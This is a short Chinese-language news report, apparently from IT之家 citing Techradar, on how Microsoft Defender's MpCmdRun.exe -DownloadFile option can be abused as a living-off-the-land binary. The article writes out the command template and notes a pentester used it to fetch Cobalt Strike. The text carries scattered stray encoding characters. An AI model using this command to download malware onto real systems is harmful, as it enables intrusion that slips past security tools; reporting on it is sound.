IT之家 9 月 5 日消息 據 Techradar 報道,在 4.18.2007.9 或 4.18.2009.9 版本的 Microsoft Defender 中,微軟增加了通過命令行下載...“”
IT之家 9 月 5 日消息 據 Techradar 報道,在 4.18.2007.9 或 4.18.2009.9 版本的 Microsoft Defender 中,微軟增加了通過命令行下載文件的功能。不過根據滲透測試人員 Mohammad Askar 的說法,對 Microsoft Defender 命令行工具的更改可能使攻擊者利用其下載惡意程序。
IT之家了解到�������,Windows 10 中存在許多 LOLBins�������,它們均具有合法功能�������。但�������是�������,利用適當�������的特權�������,黑客可以濫用這些二進制文件來繞過安全設施并進行攻擊�������,而不會通知受害者�������。
如 Askar 所述������,Microsoft Defender 命令行工具現在支持新������的 “ -DownloadFile”功能������。攻擊者可以使用 Microsoft 反惡意軟件服務命令行實用程序通過以下命令從 Internet 下載文件:“ MpCmdRun.exe -DownloadFile -url <url> -path >local-path>” ������。
通過這一途徑�������,Askar 能夠直接通過 Microsoft Defender 從遠程位置下載 Cobalt Strike 惡意軟件�������。
雖然 Defender 能夠檢測并緩解使用此方法下載�������的任何惡意文件�������,但尚不清楚在禁用了本機保護�������的情況下�������,其他流行�������的防病毒服務�������是否能夠防御這種攻擊途徑�������。